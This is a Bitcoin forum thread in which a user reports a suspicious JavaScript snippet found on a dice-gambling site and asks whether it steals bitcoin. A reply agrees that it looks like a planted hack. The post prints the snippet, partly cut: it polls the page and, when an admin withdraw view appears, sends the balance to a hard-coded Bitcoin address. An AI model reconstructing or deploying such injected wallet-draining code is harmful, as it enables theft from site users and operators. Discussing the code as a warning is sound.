Bitcoin Forum
September 27, 2018, 10:41:55 PM *
News: ♦♦ New info! Bitcoin Core users absolutely must upgrade to previously-announced 0.16.3 [Torrent]. All Bitcoin users should temporarily trust confirmations slightly less. More info.
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: Java Script Embedded to Steal BTC?  (Read 604 times)
reesev
Full Member
***
Offline Offline

Activity: 210
Merit: 100


View Profile
April 16, 2014, 03:28:45 AM
 #1

Today another user posted a link to his site based on the coindice script and right off the bat I noticed it was running a java script and from what I can tell it was stealing BTC after you had x amount.

I have included the PARTIAL script here to prevent scumbags from modifying the code for their own use but I just want to confirm that im not jumping to conclusions about what the script does..

I did contact the website owner and he has removed it. 

Code:
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",THIS BIT OF CODE HAS BEEN REMOVED
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':THIS BIT OF CODE HAS BEEN REMOVED
refreshBalancehaxored();}},1000);
1538088115
Hero Member
*
Offline Offline

Posts: 1538088115

View Profile Personal Message (Offline)

Ignore
1538088115
Reply with quote  #2

1538088115
Report to moderator
1538088115
Hero Member
*
Offline Offline

Posts: 1538088115

View Profile Personal Message (Offline)

Ignore
1538088115
Reply with quote  #2

1538088115
Report to moderator
1538088115
Hero Member
*
Offline Offline

Posts: 1538088115

View Profile Personal Message (Offline)

Ignore
1538088115
Reply with quote  #2

1538088115
Report to moderator
Make a difference with your Ether.
Donate Ether for the greater good.
SPRING.WETRUST.IO
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1538088115
Hero Member
*
Offline Offline

Posts: 1538088115

View Profile Personal Message (Offline)

Ignore
1538088115
Reply with quote  #2

1538088115
Report to moderator
Radar
Full Member
***
Offline Offline

Activity: 154
Merit: 100

Pm me if you're a casino developer!


View Profile
April 17, 2014, 08:58:13 AM
 #2

Today another user posted a link to his site based on the coindice script and right off the bat I noticed it was running a java script and from what I can tell it was stealing BTC after you had x amount.

I have included the PARTIAL script here to prevent scumbags from modifying the code for their own use but I just want to confirm that im not jumping to conclusions about what the script does..

I did contact the website owner and he has removed it. 

Code:
setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",THIS BIT OF CODE HAS BEEN REMOVED
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':THIS BIT OF CODE HAS BEEN REMOVED
refreshBalancehaxored();}},1000);


Yeah I've seen this shit coindice script made by some Ukraine.  And that code was a orchestrated hack I believe and could potentially be used again if resold.     
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!